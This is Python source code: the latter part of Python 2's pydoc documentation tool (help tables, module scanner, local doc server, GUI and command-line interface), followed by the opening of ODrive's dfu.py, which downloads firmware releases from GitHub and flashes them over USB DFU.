forceload=0): """Given an object or a path to an object, get the object and its name.""" if isinstance(thing, str): object = locate(thing, forceload) if object is None: raise ImportError, 'no Python documentation found for %r' % thing return object, thing else: name = getattr(thing, '__name__', None) return thing, name if isinstance(name, str) else None def render_doc(thing, title='Python Library Documentation: %s', forceload=0): """Render text documentation, given an object or a path to an object.""" object, name = resolve(thing, forceload) desc = describe(object) module = inspect.getmodule(object) if name and '.' in name: desc += ' in ' + name[:name.rfind('.')] elif module and module is not object: desc += ' in module ' + module.__name__ if type(object) is _OLD_INSTANCE_TYPE: # If the passed object is an instance of an old-style class, # document its available methods instead of its value. object = object.__class__ elif not (inspect.ismodule(object) or inspect.isclass(object) or inspect.isroutine(object) or inspect.isgetsetdescriptor(object) or inspect.ismemberdescriptor(object) or isinstance(object, property)): # If the passed object is a piece of data or an instance, # document its available methods instead of its value. object = type(object) desc += ' object' return title % desc + '\n\n' + text.document(object, name) def doc(thing, title='Python Library Documentation: %s', forceload=0): """Display text documentation, given an object or a path to an object.""" try: pager(render_doc(thing, title, forceload)) except (ImportError, ErrorDuringImport), value: print value def writedoc(thing, forceload=0): """Write HTML documentation to a file in the current directory.""" try: object, name = resolve(thing, forceload) page = html.page(describe(object), html.document(object, name)) file = open(name + '.html', 'w') file.write(page) file.close() print 'wrote', name + '.html' except (ImportError, ErrorDuringImport), value: print value def writedocs(dir, pkgpath='', done=None): """Write out HTML documentation for all modules in a directory tree.""" if done is None: done = {} for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath): writedoc(modname) return class Helper: # These dictionaries map a topic name to either an alias, or a tuple # (label, seealso-items). The "label" is the label of the corresponding # section in the .rst file under Doc/ and an index into the dictionary # in pydoc_data/topics.py. # # CAUTION: if you change one of these dictionaries, be sure to adapt the # list of needed labels in Doc/tools/pyspecific.py and # regenerate the pydoc_data/topics.py file by running # make pydoc-topics # in Doc/ and copying the output file into the Lib/ directory. keywords = { 'and': 'BOOLEAN', 'as': 'with', 'assert': ('assert', ''), 'break': ('break', 'while for'), 'class': ('class', 'CLASSES SPECIALMETHODS'), 'continue': ('continue', 'while for'), 'def': ('function', ''), 'del': ('del', 'BASICMETHODS'), 'elif': 'if', 'else': ('else', 'while for'), 'except': 'try', 'exec': ('exec', ''), 'finally': 'try', 'for': ('for', 'break continue while'), 'from': 'import', 'global': ('global', 'NAMESPACES'), 'if': ('if', 'TRUTHVALUE'), 'import': ('import', 'MODULES'), 'in': ('in', 'SEQUENCEMETHODS2'), 'is': 'COMPARISON', 'lambda': ('lambda', 'FUNCTIONS'), 'not': 'BOOLEAN', 'or': 'BOOLEAN', 'pass': ('pass', ''), 'print': ('print', ''), 'raise': ('raise', 'EXCEPTIONS'), 'return': ('return', 'FUNCTIONS'), 'try': ('try', 'EXCEPTIONS'), 'while': ('while', 'break continue if TRUTHVALUE'), 'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'), 'yield': ('yield', ''), } # Either add symbols to this dictionary or to the symbols dictionary # directly: Whichever is easier. They are merged later. _symbols_inverse = { 'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'), 'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&', '|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'), 'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'), 'UNARY' : ('-', '~'), 'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=', '^=', '<<=', '>>=', '**=', '//='), 'BITWISE' : ('<<', '>>', '&', '|', '^', '~'), 'COMPLEX' : ('j', 'J') } symbols = { '%': 'OPERATORS FORMATTING', '**': 'POWER', ',': 'TUPLES LISTS FUNCTIONS', '.': 'ATTRIBUTES FLOAT MODULES OBJECTS', '...': 'ELLIPSIS', ':': 'SLICINGS DICTIONARYLITERALS', '@': 'def class', '\\': 'STRINGS', '_': 'PRIVATENAMES', '__': 'PRIVATENAMES SPECIALMETHODS', '`': 'BACKQUOTES', '(': 'TUPLES FUNCTIONS CALLS', ')': 'TUPLES FUNCTIONS CALLS', '[': 'LISTS SUBSCRIPTS SLICINGS', ']': 'LISTS SUBSCRIPTS SLICINGS' } for topic, symbols_ in _symbols_inverse.iteritems(): for symbol in symbols_: topics = symbols.get(symbol, topic) if topic not in topics: topics = topics + ' ' + topic symbols[symbol] = topics topics = { 'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS ' 'FUNCTIONS CLASSES MODULES FILES inspect'), 'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING ' 'TYPES'), 'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'), 'FORMATTING': ('formatstrings', 'OPERATORS'), 'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS ' 'FORMATTING TYPES'), 'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'), 'INTEGER': ('integers', 'int range'), 'FLOAT': ('floating', 'float math'), 'COMPLEX': ('imaginary', 'complex cmath'), 'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'), 'MAPPINGS': 'DICTIONARIES', 'FUNCTIONS': ('typesfunctions', 'def TYPES'), 'METHODS': ('typesmethods', 'class def CLASSES TYPES'), 'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'), 'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'), 'FRAMEOBJECTS': 'TYPES', 'TRACEBACKS': 'TYPES', 'NONE': ('bltin-null-object', ''), 'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'), 'FILES': ('bltin-file-objects', ''), 'SPECIALATTRIBUTES': ('specialattrs', ''), 'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'), 'MODULES': ('typesmodules', 'import'), 'PACKAGES': 'import', 'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN ' 'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER ' 'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES ' 'LISTS DICTIONARIES BACKQUOTES'), 'OPERATORS': 'EXPRESSIONS', 'PRECEDENCE': 'EXPRESSIONS', 'OBJECTS': ('objects', 'TYPES'), 'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS ' 'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS ' 'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'), 'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'), 'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'), 'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'), 'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 ' 'SPECIALMETHODS'), 'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 ' 'SPECIALMETHODS'), 'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'), 'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT ' 'SPECIALMETHODS'), 'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'), 'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'), 'DYNAMICFEATURES': ('dynamic-features', ''), 'SCOPING': 'NAMESPACES', 'FRAMES': 'NAMESPACES', 'EXCEPTIONS': ('exceptions', 'try except finally raise'), 'COERCIONS': ('coercion-rules','CONVERSIONS'), 'CONVERSIONS': ('conversions', 'COERCIONS'), 'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'), 'SPECIALIDENTIFIERS': ('id-classes', ''), 'PRIVATENAMES': ('atom-identifiers', ''), 'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS ' 'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'), 'TUPLES': 'SEQUENCES', 'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'), 'LISTS': ('typesseq-mutable', 'LISTLITERALS'), 'LISTLITERALS': ('lists', 'LISTS LITERALS'), 'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'), 'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'), 'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'), 'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ' 'ATTRIBUTEMETHODS'), 'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'), 'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'), 'CALLS': ('calls', 'EXPRESSIONS'), 'POWER': ('power', 'EXPRESSIONS'), 'UNARY': ('unary', 'EXPRESSIONS'), 'BINARY': ('binary', 'EXPRESSIONS'), 'SHIFTING': ('shifting', 'EXPRESSIONS'), 'BITWISE': ('bitwise', 'EXPRESSIONS'), 'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'), 'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'), 'ASSERTION': 'assert', 'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'), 'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'), 'DELETION': 'del', 'PRINTING': 'print', 'RETURNING': 'return', 'IMPORTING': 'import', 'CONDITIONAL': 'if', 'LOOPING': ('compound', 'for while break continue'), 'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'), 'DEBUGGING': ('debugger', 'pdb'), 'CONTEXTMANAGERS': ('context-managers', 'with'), } def __init__(self, input=None, output=None): self._input = input self._output = output input = property(lambda self: self._input or sys.stdin) output = property(lambda self: self._output or sys.stdout) def __repr__(self): if inspect.stack()[1][3] == '?': self() return '' return '<pydoc.Helper instance>' _GoInteractive = object() def __call__(self, request=_GoInteractive): if request is not self._GoInteractive: self.help(request) else: self.intro() self.interact() self.output.write(''' You are now leaving help and returning to the Python interpreter. If you want to ask for help on a particular object directly from the interpreter, you can type "help(object)". Executing "help('string')" has the same effect as typing a particular string at the help> prompt. ''') def interact(self): self.output.write('\n') while True: try: request = self.getline('help> ') if not request: break except (KeyboardInterrupt, EOFError): break request = strip(replace(request, '"', '', "'", '')) if lower(request) in ('q', 'quit'): break self.help(request) def getline(self, prompt): """Read one line, using raw_input when available.""" if self.input is sys.stdin: return raw_input(prompt) else: self.output.write(prompt) self.output.flush() return self.input.readline() def help(self, request): if type(request) is type(''): request = request.strip() if request == 'help': self.intro() elif request == 'keywords': self.listkeywords() elif request == 'symbols': self.listsymbols() elif request == 'topics': self.listtopics() elif request == 'modules': self.listmodules() elif request[:8] == 'modules ': self.listmodules(split(request)[1]) elif request in self.symbols: self.showsymbol(request) elif request in self.keywords: self.showtopic(request) elif request in self.topics: self.showtopic(request) elif request: doc(request, 'Help on %s:') elif isinstance(request, Helper): self() else: doc(request, 'Help on %s:') self.output.write('\n') def intro(self): self.output.write(''' Welcome to Python %s! This is the online help utility. If this is your first time using Python, you should definitely check out the tutorial on the Internet at http://docs.python.org/%s/tutorial/. Enter the name of any module, keyword, or topic to get help on writing Python programs and using Python modules. To quit this help utility and return to the interpreter, just type "quit". To get a list of available modules, keywords, or topics, type "modules", "keywords", or "topics". Each module also comes with a one-line summary of what it does; to list the modules whose summaries contain a given word such as "spam", type "modules spam". ''' % tuple([sys.version[:3]]*2)) def list(self, items, columns=4, width=80): items = items[:] items.sort() colw = width / columns rows = (len(items) + columns - 1) / columns for row in range(rows): for col in range(columns): i = col * rows + row if i < len(items): self.output.write(items[i]) if col < columns - 1: self.output.write(' ' + ' ' * (colw-1 - len(items[i]))) self.output.write('\n') def listkeywords(self): self.output.write(''' Here is a list of the Python keywords. Enter any keyword to get more help. ''') self.list(self.keywords.keys()) def listsymbols(self): self.output.write(''' Here is a list of the punctuation symbols which Python assigns special meaning to. Enter any symbol to get more help. ''') self.list(self.symbols.keys()) def listtopics(self): self.output.write(''' Here is a list of available topics. Enter any topic name to get more help. ''') self.list(self.topics.keys()) def showtopic(self, topic, more_xrefs=''): try: import pydoc_data.topics except ImportError: self.output.write(''' Sorry, topic and keyword documentation is not available because the module "pydoc_data.topics" could not be found. ''') return target = self.topics.get(topic, self.keywords.get(topic)) if not target: self.output.write('no documentation found for %s\n' % repr(topic)) return if type(target) is type(''): return self.showtopic(target, more_xrefs) label, xrefs = target try: doc = pydoc_data.topics.topics[label] except KeyError: self.output.write('no documentation found for %s\n' % repr(topic)) return pager(strip(doc) + '\n') if more_xrefs: xrefs = (xrefs or '') + ' ' + more_xrefs if xrefs: import StringIO, formatter buffer = StringIO.StringIO() formatter.DumbWriter(buffer).send_flowing_data( 'Related help topics: ' + join(split(xrefs), ', ') + '\n') self.output.write('\n%s\n' % buffer.getvalue()) def showsymbol(self, symbol): target = self.symbols[symbol] topic, _, xrefs = target.partition(' ') self.showtopic(topic, xrefs) def listmodules(self, key=''): if key: self.output.write(''' Here is a list of matching modules. Enter any module name to get more help. ''') apropos(key) else: self.output.write(''' Please wait a moment while I gather a list of all available modules... ''') modules = {} def callback(path, modname, desc, modules=modules): if modname and modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' if find(modname, '.') < 0: modules[modname] = 1 def onerror(modname): callback(None, modname, None) ModuleScanner().run(callback, onerror=onerror) self.list(modules.keys()) self.output.write(''' Enter any module name to get more help. Or, type "modules spam" to search for modules whose descriptions contain the word "spam". ''') help = Helper() class Scanner: """A generic tree iterator.""" def __init__(self, roots, children, descendp): self.roots = roots[:] self.state = [] self.children = children self.descendp = descendp def next(self): if not self.state: if not self.roots: return None root = self.roots.pop(0) self.state = [(root, self.children(root))] node, children = self.state[-1] if not children: self.state.pop() return self.next() child = children.pop(0) if self.descendp(child): self.state.append((child, self.children(child))) return child class ModuleScanner: """An interruptible scanner that searches module synopses.""" def run(self, callback, key=None, completer=None, onerror=None): if key: key = lower(key) self.quit = False seen = {} for modname in sys.builtin_module_names: if modname != '__main__': seen[modname] = 1 if key is None: callback(None, modname, '') else: desc = split(__import__(modname).__doc__ or '', '\n')[0] if find(lower(modname + ' - ' + desc), key) >= 0: callback(None, modname, desc) for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror): if self.quit: break if key is None: callback(None, modname, '') else: loader = importer.find_module(modname) if hasattr(loader,'get_source'): import StringIO desc = source_synopsis( StringIO.StringIO(loader.get_source(modname)) ) or '' if hasattr(loader,'get_filename'): path = loader.get_filename(modname) else: path = None else: module = loader.load_module(modname) desc = module.__doc__.splitlines()[0] if module.__doc__ else '' path = getattr(module,'__file__',None) if find(lower(modname + ' - ' + desc), key) >= 0: callback(path, modname, desc) if completer: completer() def apropos(key): """Print all the one-line module summaries that contain a substring.""" def callback(path, modname, desc): if modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' print modname, desc and '- ' + desc def onerror(modname): pass with warnings.catch_warnings(): warnings.filterwarnings('ignore') # ignore problems during import ModuleScanner().run(callback, key, onerror=onerror) # --------------------------------------------------- web browser interface def serve(port, callback=None, completer=None): import BaseHTTPServer, mimetools, select # Patch up mimetools.Message so it doesn't break if rfc822 is reloaded. class Message(mimetools.Message): def __init__(self, fp, seekable=1): Message = self.__class__ Message.__bases__[0].__bases__[0].__init__(self, fp, seekable) self.encodingheader = self.getheader('content-transfer-encoding') self.typeheader = self.getheader('content-type') self.parsetype() self.parseplist() class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler): def send_document(self, title, contents): try: self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(html.page(title, contents)) except IOError: pass def do_GET(self): path = self.path if path[-5:] == '.html': path = path[:-5] if path[:1] == '/': path = path[1:] if path and path != '.': try: obj = locate(path, forceload=1) except ErrorDuringImport, value: self.send_document(path, html.escape(str(value))) return if obj: self.send_document(describe(obj), html.document(obj, path)) else: self.send_document(path, 'no Python documentation found for %s' % repr(path)) else: heading = html.heading( '<big><big><strong>Python: Index of Modules</strong></big></big>', '#ffffff', '#7799ee') def bltinlink(name): return '<a href="%s.html">%s</a>' % (name, name) names = filter(lambda x: x != '__main__', sys.builtin_module_names) contents = html.multicolumn(names, bltinlink) indices = ['<p>' + html.bigsection( 'Built-in Modules', '#ffffff', '#ee77aa', contents)] seen = {} for dir in sys.path: indices.append(html.index(dir, seen)) contents = heading + join(indices) + '''<p align=right> <font color="#909090" face="helvetica, arial"><strong> pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>''' self.send_document('Index of Modules', contents) def log_message(self, *args): pass class DocServer(BaseHTTPServer.HTTPServer): def __init__(self, port, callback): host = 'localhost' self.address = (host, port) self.callback = callback self.base.__init__(self, self.address, self.handler) def serve_until_quit(self): import select self.quit = False while not self.quit: rd, wr, ex = select.select([self.socket.fileno()], [], [], 1) if rd: self.handle_request() def server_activate(self): self.base.server_activate(self) self.url = 'http://%s:%d/' % (self.address[0], self.server_port) if self.callback: self.callback(self) DocServer.base = BaseHTTPServer.HTTPServer DocServer.handler = DocHandler DocHandler.MessageClass = Message try: try: DocServer(port, callback).serve_until_quit() except (KeyboardInterrupt, select.error): pass finally: if completer: completer() # ----------------------------------------------------- graphical interface def gui(): """Graphical interface (starts web server and pops up a control window).""" class GUI: def __init__(self, window, port=7464): self.window = window self.server = None self.scanner = None import Tkinter self.server_frm = Tkinter.Frame(window) self.title_lbl = Tkinter.Label(self.server_frm, text='Starting server...\n ') self.open_btn = Tkinter.Button(self.server_frm, text='open browser', command=self.open, state='disabled') self.quit_btn = Tkinter.Button(self.server_frm, text='quit serving', command=self.quit, state='disabled') self.search_frm = Tkinter.Frame(window) self.search_lbl = Tkinter.Label(self.search_frm, text='Search for') self.search_ent = Tkinter.Entry(self.search_frm) self.search_ent.bind('<Return>', self.search) self.stop_btn = Tkinter.Button(self.search_frm, text='stop', pady=0, command=self.stop, state='disabled') if sys.platform == 'win32': # Trying to hide and show this button crashes under Windows. self.stop_btn.pack(side='right') self.window.title('pydoc') self.window.protocol('WM_DELETE_WINDOW', self.quit) self.title_lbl.pack(side='top', fill='x') self.open_btn.pack(side='left', fill='x', expand=1) self.quit_btn.pack(side='right', fill='x', expand=1) self.server_frm.pack(side='top', fill='x') self.search_lbl.pack(side='left') self.search_ent.pack(side='right', fill='x', expand=1) self.search_frm.pack(side='top', fill='x') self.search_ent.focus_set() font = ('helvetica', sys.platform == 'win32' and 8 or 10) self.result_lst = Tkinter.Listbox(window, font=font, height=6) self.result_lst.bind('<Button-1>', self.select) self.result_lst.bind('<Double-Button-1>', self.goto) self.result_scr = Tkinter.Scrollbar(window, orient='vertical', command=self.result_lst.yview) self.result_lst.config(yscrollcommand=self.result_scr.set) self.result_frm = Tkinter.Frame(window) self.goto_btn = Tkinter.Button(self.result_frm, text='go to selected', command=self.goto) self.hide_btn = Tkinter.Button(self.result_frm, text='hide results', command=self.hide) self.goto_btn.pack(side='left', fill='x', expand=1) self.hide_btn.pack(side='right', fill='x', expand=1) self.window.update() self.minwidth = self.window.winfo_width() self.minheight = self.window.winfo_height() self.bigminheight = (self.server_frm.winfo_reqheight() + self.search_frm.winfo_reqheight() + self.result_lst.winfo_reqheight() + self.result_frm.winfo_reqheight()) self.bigwidth, self.bigheight = self.minwidth, self.bigminheight self.expanded = 0 self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight)) self.window.wm_minsize(self.minwidth, self.minheight) self.window.tk.willdispatch() import threading threading.Thread( target=serve, args=(port, self.ready, self.quit)).start() def ready(self, server): self.server = server self.title_lbl.config( text='Python documentation server at\n' + server.url) self.open_btn.config(state='normal') self.quit_btn.config(state='normal') def open(self, event=None, url=None): url = url or self.server.url try: import webbrowser webbrowser.open(url) except ImportError: # pre-webbrowser.py compatibility if sys.platform == 'win32': os.system('start "%s"' % url) else: rc = os.system('netscape -remote "openURL(%s)" &' % url) if rc: os.system('netscape "%s" &' % url) def quit(self, event=None): if self.server: self.server.quit = 1 self.window.quit() def search(self, event=None): key = self.search_ent.get() self.stop_btn.pack(side='right') self.stop_btn.config(state='normal') self.search_lbl.config(text='Searching for "%s"...' % key) self.search_ent.forget() self.search_lbl.pack(side='left') self.result_lst.delete(0, 'end') self.goto_btn.config(state='disabled') self.expand() import threading if self.scanner: self.scanner.quit = 1 self.scanner = ModuleScanner() def onerror(modname): pass threading.Thread(target=self.scanner.run, args=(self.update, key, self.done), kwargs=dict(onerror=onerror)).start() def update(self, path, modname, desc): if modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' self.result_lst.insert('end', modname + ' - ' + (desc or '(no description)')) def stop(self, event=None): if self.scanner: self.scanner.quit = 1 self.scanner = None def done(self): self.scanner = None self.search_lbl.config(text='Search for') self.search_lbl.pack(side='left') self.search_ent.pack(side='right', fill='x', expand=1) if sys.platform != 'win32': self.stop_btn.forget() self.stop_btn.config(state='disabled') def select(self, event=None): self.goto_btn.config(state='normal') def goto(self, event=None): selection = self.result_lst.curselection() if selection: modname = split(self.result_lst.get(selection[0]))[0] self.open(url=self.server.url + modname + '.html') def collapse(self): if not self.expanded: return self.result_frm.forget() self.result_scr.forget() self.result_lst.forget() self.bigwidth = self.window.winfo_width() self.bigheight = self.window.winfo_height() self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight)) self.window.wm_minsize(self.minwidth, self.minheight) self.expanded = 0 def expand(self): if self.expanded: return self.result_frm.pack(side='bottom', fill='x') self.result_scr.pack(side='right', fill='y') self.result_lst.pack(side='top', fill='both', expand=1) self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight)) self.window.wm_minsize(self.minwidth, self.bigminheight) self.expanded = 1 def hide(self, event=None): self.stop() self.collapse() import Tkinter try: root = Tkinter.Tk() # Tk will crash if pythonw.exe has an XP .manifest # file and the root has is not destroyed explicitly. # If the problem is ever fixed in Tk, the explicit # destroy can go. try: gui = GUI(root) root.mainloop() finally: root.destroy() except KeyboardInterrupt: pass # -------------------------------------------------- command-line interface def ispath(x): return isinstance(x, str) and find(x, os.sep) >= 0 def cli(): """Command-line interface (looks at sys.argv to decide what to do).""" import getopt class BadUsage: pass # Scripts don't get the current directory in their path by default # unless they are run with the '-m' switch if '' not in sys.path: scriptdir = os.path.dirname(sys.argv[0]) if scriptdir in sys.path: sys.path.remove(scriptdir) sys.path.insert(0, '.') try: opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w') writing = 0 for opt, val in opts: if opt == '-g': gui() return if opt == '-k': apropos(val) return if opt == '-p': try: port = int(val) except ValueError: raise BadUsage def ready(server): print 'pydoc server ready at %s' % server.url def stopped(): print 'pydoc server stopped' serve(port, ready, stopped) return if opt == '-w': writing = 1 if not args: raise BadUsage for arg in args: if ispath(arg) and not os.path.exists(arg): print 'file %r does not exist' % arg break try: if ispath(arg) and os.path.isfile(arg): arg = importfile(arg) if writing: if ispath(arg) and os.path.isdir(arg): writedocs(arg) else: writedoc(arg) else: help.help(arg) except ErrorDuringImport, value: print value except (getopt.error, BadUsage): cmd = os.path.basename(sys.argv[0]) print """pydoc - the Python documentation tool %s <name> ... Show text documentation on something. <name> may be the name of a Python keyword, topic, function, module, or package, or a dotted reference to a class or function within a module or module in a package. If <name> contains a '%s', it is used as the path to a Python source file to document. If name is 'keywords', 'topics', or 'modules', a listing of these things is displayed. %s -k <keyword> Search for a keyword in the synopsis lines of all available modules. %s -p <port> Start an HTTP server on the given port on the local machine. Port number 0 can be used to get an arbitrary unused port. %s -g Pop up a graphical interface for finding and serving documentation. %s -w <name> ... Write out the HTML documentation for a module to a file in the current directory. If <name> contains a '%s', it is treated as a filename; if it names a directory, documentation is written for all the contents. """ % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep) if __name__ == '__main__': cli()
dfu.py
#!/usr/bin/env python """ Tool for flashing .hex files to the ODrive via the STM built-in USB DFU mode. """ import argparse import sys import time import threading import platform import struct import requests import re import io import os import usb.core import fibre import odrive from odrive.utils import Event, OperationAbortedException from odrive.dfuse import * try: from intelhex import IntelHex except: sudo_prefix = "" if platform.system() == "Windows" else "sudo " print("You need intelhex for this ({}pip install IntelHex)".format(sudo_prefix), file=sys.stderr) sys.exit(1) def get_fw_version_string(fw_version): if (fw_version[0], fw_version[1], fw_version[2]) == (0, 0, 0): return "[unknown version]" else: return "v{}.{}.{}{}".format(fw_version[0], fw_version[1], fw_version[2], "-dev" if fw_version[3] else "") def get_hw_version_string(hw_version): if hw_version == (0, 0, 0): return "[unknown version]" else: return "v{}.{}{}".format(hw_version[0], hw_version[1], ("-" + str(hw_version[2]) + "V") if hw_version[2] > 0 else "") def populate_sectors(sectors, hexfile): """ Checks for which on-device sectors there is data in the hex file and returns a (sector, data) tuple for each touched sector where data is a byte array of the same size as the sector. """ for sector in sectors: addr = sector['addr'] size = sector['len'] # check if any segment from the hexfile overlaps with this sector touched = False for (start, end) in hexfile.segments(): if start < addr and end > addr: touched = True break elif start >= addr and start < addr + size: touched = True break if touched: # TODO: verify if the section is writable yield (sector, hexfile.tobinarray(addr, addr + size - 1)) def get_first_mismatch_index(array1, array2): """ Compares two arrays and returns the index of the first unequal item or None if both arrays are equal """ if len(array1) != len(array2): raise Exception("arrays must be same size") for pos in range(len(array1)): if (array1[pos] != array2[pos]): return pos return None def dump_otp(dfudev): """ Dumps the contents of the one-time-programmable memory for debugging purposes. The OTP is used to determine the board version. """ # 512 Byte OTP otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0] data = dfudev.read_sector(otp_sector) print(' '.join('{:02X}'.format(x) for x in data)) # 16 lock bytes otp_lock_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7A00][0] data = dfudev.read_sector(otp_lock_sector) print(' '.join('{:02X}'.format(x) for x in data)) class Firmware(): def __init__(self): self.fw_version = (0, 0, 0, True) self.hw_version = (0, 0, 0) @staticmethod def is_newer(a, b): a_num = (a[0], a[1], a[2]) b_num = (b[0], b[1], b[2]) if a_num == (0, 0, 0) or b_num == (0, 0, 0): return False # Cannot compare unknown versions return a_num > b_num or (a_num == b_num and not a[3] and b[3]) def __gt__(self, other): """ Compares two firmware versions. If both versions are equal, the prerelease version is considered older than the release version. """ if not isinstance(other, tuple): other = other.fw_version return Firmware.is_newer(self.fw_version, other) def __lt__(self, other): """ Compares two firmware versions. If both versions are equal, the prerelease version is considered older than the release version. """ if not isinstance(other, tuple): other = other.fw_version return Firmware.is_newer(other, self.fw_version) def is_compatible(self, hw_version): """ Determines if this firmware is compatible with the specified hardware version """ return self.hw_version == hw_version class FirmwareFromGithub(Firmware): """ Represents a firmware asset """ def __init__(self, release_json, asset_json): Firmware.__init__(self) if release_json['draft'] or release_json['prerelease']: release_json['tag_name'] += "*" self.fw_version = odrive.version.version_str_to_tuple(release_json['tag_name']) hw_version_regex = r'.*v([0-9]+).([0-9]+)(-(?P<voltage>[0-9]+)V)?.hex' hw_version_match = re.search(hw_version_regex, asset_json['name']) self.hw_version = (int(hw_version_match[1]), int(hw_version_match[2]), int(hw_version_match.groupdict().get('voltage') or 0)) self.github_asset_id = asset_json['id'] self.hex = None # no technical reason to fetch this - just interesting self.download_count = asset_json['download_count'] def get_as_hex(self): """ Returns the content of the firmware in as a binary array in Intel Hex format """ if self.hex is None: print("Downloading firmware {}...".format(get_fw_version_string(self.fw_version))) response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases/assets/' + str(self.github_asset_id), headers={'Accept': 'application/octet-stream'}) if response.status_code != 200: raise Exception("failed to download firmware") self.hex = response.content return io.StringIO(self.hex.decode('utf-8')) class FirmwareFromFile(Firmware): def __init__(self, file): Firmware.__init__(self) self._file = file def get_as_hex(self): return self._file def get_all_github_firmwares(): response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases') if response.status_code != 200: raise Exception("could not fetch releases") response_json = response.json() for release_json in response_json: for asset_json in release_json['assets']: try: if asset_json['name'].lower().endswith('.hex'): fw = FirmwareFromGithub(release_json, asset_json) yield fw except Exception as ex: print(ex) def get_newest_firmware(hw_version): """ Returns the newest available firmware for the specified hardware version """ firmwares = get_all_github_firmwares() firmwares = filter(lambda fw: not fw.fw_version[3], firmwares) # ignore prereleases firmwares = filter(lambda fw: fw.hw_version == hw_version, firmwares) firmwares = list(firmwares) firmwares.sort() return firmwares[-1] if len(firmwares) else None def show_deferred_message(message, cancellation_token): """ Shows a message after 10s, unless cancellation_token gets set. """ def show_message_thread(message, cancellation_token): for _ in range(1,10): if cancellation_token.is_set(): return time.sleep(1) if not cancellation_token.is_set(): print(message) t = threading.Thread(target=show_message_thread, args=(message, cancellation_token)) t.daemon = True t.start() def put_into_dfu_mode(device, cancellation_token): """ Puts the specified device into DFU mode """ if not hasattr(device, "enter_dfu_mode"): print("The firmware on device {} does not support DFU. You need to \n" "flash the firmware once using STLink (`make flash`), after that \n" "DFU with this script should work fine." .format(device.__channel__.usb_device.serial_number)) return print("Putting device {} into DFU mode...".format(device.__channel__.usb_device.serial_number)) try: device.enter_dfu_mode() except fibre.ChannelBrokenException: pass # this is expected because the device reboots if platform.system() == "Windows": show_deferred_message("Still waiting for the device to reappear.\n" "Use the Zadig utility to set the driver of 'STM32 BOOTLOADER' to libusb-win32.", cancellation_token) def find_device_in_dfu_mode(serial_number, cancellation_token): """ Polls libusb until a device in DFU mode is found """ while not cancellation_token.is_set(): params = {} if serial_number == None else {'serial_number': serial_number} stm_device = usb.core.find(idVendor=0x0483, idProduct=0xdf11, **params) if stm_device != None: return stm_device time.sleep(1) return None def update_device(device, firmware, logger, cancellation_token): """ Updates the specified device with the specified firmware. The device passed to this function can either be in normal mode or in DFU mode. The firmware should be an instance of Firmware or None. If firmware is None, the 